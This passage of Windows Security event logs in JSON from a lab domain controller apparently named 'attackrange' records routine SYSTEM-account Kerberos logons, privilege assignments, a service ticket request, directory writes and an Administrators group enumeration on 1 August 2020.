Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-6178966$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x44cf6","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220312,"ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-0-0\r\n\tAccount Name:\t\t-\r\n\tAccount Domain:\t\t-\r\n\tLogon ID:\t\t0x0\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon ID:\t\t0x44CF6\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{77AE7113-A264-8FEA-3CEA-ABED442060A2}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x0\r\n\tProcess Name:\t\t-\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\tfe80::286a:52de:ea43:8266\r\n\tSource Port:\t\t49700\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tKerberos\r\n\tAuthentication Package:\tKerberos\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-0-0","SubjectUserName":"-","SubjectDomainName":"-","SubjectLogonId":"0x0","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-6178966$","TargetDomainName":"ATTACKRANGE.LOCAL","TargetLogonId":"0x44cf6","LogonType":"3","LogonProcessName":"Kerberos","AuthenticationPackageName":"Kerberos","WorkstationName":"-","LogonGuid":"{77AE7113-A264-8FEA-3CEA-ABED442060A2}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"-","IpAddress":"fe80::286a:52de:ea43:8266","IpPort":"49700","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4662,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14080,"OpcodeValue":0,"RecordNumber":220313,"ActivityID":"{C6A61085-67D8-0001-8610-A6C6D867D601}","ProcessID":864,"ThreadID":1104,"Channel":"Security","Message":"An operation was performed on an object.\r\n\r\nSubject :\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x44CF6\r\n\r\nObject:\r\n\tObject Server:\t\tDS\r\n\tObject Type:\t\t%{bf967a86-0de6-11d0-a285-00aa003049e2}\r\n\tObject Name:\t\t%{c149f97a-89fa-47e6-b511-e975daba2309}\r\n\tHandle ID:\t\t0x0\r\n\r\nOperation:\r\n\tOperation Type:\t\tObject Access\r\n\tAccesses:\t\tWrite Property\r\n\t\t\t\t\r\n\tAccess Mask:\t\t0x20\r\n\tProperties:\t\tWrite Property\r\n\t\t{e48d0154-bcf8-11d1-8702-00c04fb96050}\r\n\t\t\t{f3a64788-5306-11d1-a9c5-0000f80367c1}\r\n\t{bf967a86-0de6-11d0-a285-00aa003049e2}\r\n\r\n\r\nAdditional Information:\r\n\tParameter 1:\t\t-\r\n\tParameter 2:\t\t","Category":"Directory Service Access","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-6178966$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x44cf6","ObjectServer":"DS","ObjectType":"%{bf967a86-0de6-11d0-a285-00aa003049e2}","ObjectName":"%{c149f97a-89fa-47e6-b511-e975daba2309}","OperationType":"Object Access","HandleId":"0x0","AccessList":"%%7685\r\n\t\t\t\t","AccessMask":"0x20","Properties":"%%7685\r\n\t\t{e48d0154-bcf8-11d1-8702-00c04fb96050}\r\n\t\t\t{f3a64788-5306-11d1-a9c5-0000f80367c1}\r\n\t{bf967a86-0de6-11d0-a285-00aa003049e2}\r\n","AdditionalInfo":"-","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4662,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14080,"OpcodeValue":0,"RecordNumber":220314,"ActivityID":"{C6A61085-67D8-0001-8610-A6C6D867D601}","ProcessID":864,"ThreadID":1104,"Channel":"Security","Message":"An operation was performed on an object.\r\n\r\nSubject :\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x44CF6\r\n\r\nObject:\r\n\tObject Server:\t\tDS\r\n\tObject Type:\t\t%{bf967a86-0de6-11d0-a285-00aa003049e2}\r\n\tObject Name:\t\t%{c149f97a-89fa-47e6-b511-e975daba2309}\r\n\tHandle ID:\t\t0x0\r\n\r\nOperation:\r\n\tOperation Type:\t\tObject Access\r\n\tAccesses:\t\tWrite Property\r\n\t\t\t\t\r\n\tAccess Mask:\t\t0x20\r\n\tProperties:\t\tWrite Property\r\n\t\t{e48d0154-bcf8-11d1-8702-00c04fb96050}\r\n\t\t\t{f3a64788-5306-11d1-a9c5-0000f80367c1}\r\n\t{bf967a86-0de6-11d0-a285-00aa003049e2}\r\n\r\n\r\nAdditional Information:\r\n\tParameter 1:\t\t-\r\n\tParameter 2:\t\t","Category":"Directory Service Access","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-6178966$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x44cf6","ObjectServer":"DS","ObjectType":"%{bf967a86-0de6-11d0-a285-00aa003049e2}","ObjectName":"%{c149f97a-89fa-47e6-b511-e975daba2309}","OperationType":"Object Access","HandleId":"0x0","AccessList":"%%7685\r\n\t\t\t\t","AccessMask":"0x20","Properties":"%%7685\r\n\t\t{e48d0154-bcf8-11d1-8702-00c04fb96050}\r\n\t\t\t{f3a64788-5306-11d1-a9c5-0000f80367c1}\r\n\t{bf967a86-0de6-11d0-a285-00aa003049e2}\r\n","AdditionalInfo":"-","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220315,"ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x44F70\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-6178966$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x44f70","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220316,"ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-0-0\r\n\tAccount Name:\t\t-\r\n\tAccount Domain:\t\t-\r\n\tLogon ID:\t\t0x0\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon ID:\t\t0x44F70\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{77AE7113-A264-8FEA-3CEA-ABED442060A2}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x0\r\n\tProcess Name:\t\t-\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\tfe80::286a:52de:ea43:8266\r\n\tSource Port:\t\t49703\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tKerberos\r\n\tAuthentication Package:\tKerberos\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-0-0","SubjectUserName":"-","SubjectDomainName":"-","SubjectLogonId":"0x0","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-6178966$","TargetDomainName":"ATTACKRANGE.LOCAL","TargetLogonId":"0x44f70","LogonType":"3","LogonProcessName":"Kerberos","AuthenticationPackageName":"Kerberos","WorkstationName":"-","LogonGuid":"{77AE7113-A264-8FEA-3CEA-ABED442060A2}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"-","IpAddress":"fe80::286a:52de:ea43:8266","IpPort":"49703","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4769,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14337,"OpcodeValue":0,"RecordNumber":220317,"ProcessID":864,"ThreadID":104,"Channel":"Security","Message":"A Kerberos service ticket was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tWIN-DC-6178966$@ATTACKRANGE.LOCAL\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon GUID:\t\t{00831AAD-7772-5B99-90B2-A3A58B721FE0}\r\n\r\nService Information:\r\n\tService Name:\t\tWIN-DC-6178966$\r\n\tService ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-1008\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810000\r\n\tTicket Encryption Type:\t0x12\r\n\tFailure Code:\t\t0x0\r\n\tTransited Services:\t-\r\n\r\nThis event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.\r\n\r\nThis event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.\r\n\r\nTicket options, encryption types, and failure codes are defined in RFC 4120.","Category":"Kerberos Service Ticket Operations","Opcode":"Info","TargetUserName":"WIN-DC-6178966$@ATTACKRANGE.LOCAL","TargetDomainName":"ATTACKRANGE.LOCAL","ServiceName":"WIN-DC-6178966$","ServiceSid":"S-1-5-21-2231640892-1842410504-3836505531-1008","TicketOptions":"0x40810000","TicketEncryptionType":"0x12","IpAddress":"::1","IpPort":"0","Status":"0x0","LogonGuid":"{00831AAD-7772-5B99-90B2-A3A58B721FE0}","TransmittedServices":"-","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220318,"ProcessID":864,"ThreadID":104,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x45098\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-6178966$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x45098","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220319,"ProcessID":864,"ThreadID":104,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-0-0\r\n\tAccount Name:\t\t-\r\n\tAccount Domain:\t\t-\r\n\tLogon ID:\t\t0x0\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tDelegation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon ID:\t\t0x45098\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{77AE7113-A264-8FEA-3CEA-ABED442060A2}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x0\r\n\tProcess Name:\t\t-\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\tfe80::286a:52de:ea43:8266\r\n\tSource Port:\t\t49704\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tKerberos\r\n\tAuthentication Package:\tKerberos\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-0-0","SubjectUserName":"-","SubjectDomainName":"-","SubjectLogonId":"0x0","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-6178966$","TargetDomainName":"ATTACKRANGE.LOCAL","TargetLogonId":"0x45098","LogonType":"3","LogonProcessName":"Kerberos","AuthenticationPackageName":"Kerberos","WorkstationName":"-","LogonGuid":"{77AE7113-A264-8FEA-3CEA-ABED442060A2}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"-","IpAddress":"fe80::286a:52de:ea43:8266","IpPort":"49704","ImpersonationLevel":"%%1840","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4799,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":13826,"OpcodeValue":0,"RecordNumber":220320,"ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"A security-enabled local group membership was enumerated.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E7\r\n\r\nGroup:\r\n\tSecurity ID:\t\tS-1-5-32-544\r\n\tGroup Name:\t\tAdministrators\r\n\tGroup Domain:\t\tBuiltin\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x474\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe","Category":"Security Group Management","Opcode":"Info","TargetUserName":"Administrators","TargetDomainName":"Builtin","TargetSid":"S-1-5-32-544","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-6178966$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e7","CallerProcessId":"0x474","CallerProcessName":"C:\\Windows\\System32\\svchost.exe","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220321,"ProcessID":864,"ThreadID":2652,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x45322\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-6178966$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x45322","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220322,"ProcessID":864,"ThreadID":2652,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-0-0\r\n\tAccount Name:\t\t-\r\n\tAccount Domain:\t\t-\r\n\tLogon ID:\t\t0x0\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon ID:\t\t0x45322\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{77AE7113-A264-8FEA-3CEA-ABED442060A2}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x0\r\n\tProcess Name:\t\t-\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\tfe80::286a:52de:ea43:8266\r\n\tSource Port:\t\t49705\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tKerberos\r\n\tAuthentication Package:\tKerberos\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-0-0","SubjectUserName":"-","SubjectDomainName":"-","SubjectLogonId":"0x0","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-6178966$","TargetDomainName":"ATTACKRANGE.LOCAL","TargetLogonId":"0x45322","LogonType":"3","LogonProcessName":"Kerberos","AuthenticationPackageName":"Kerberos","WorkstationName":"-","LogonGuid":"{77AE7113-A264-8FEA-3CEA-ABED442060A2}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"-","IpAddress":"fe80::286a:52de:ea43:8266","IpPort":"49705","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
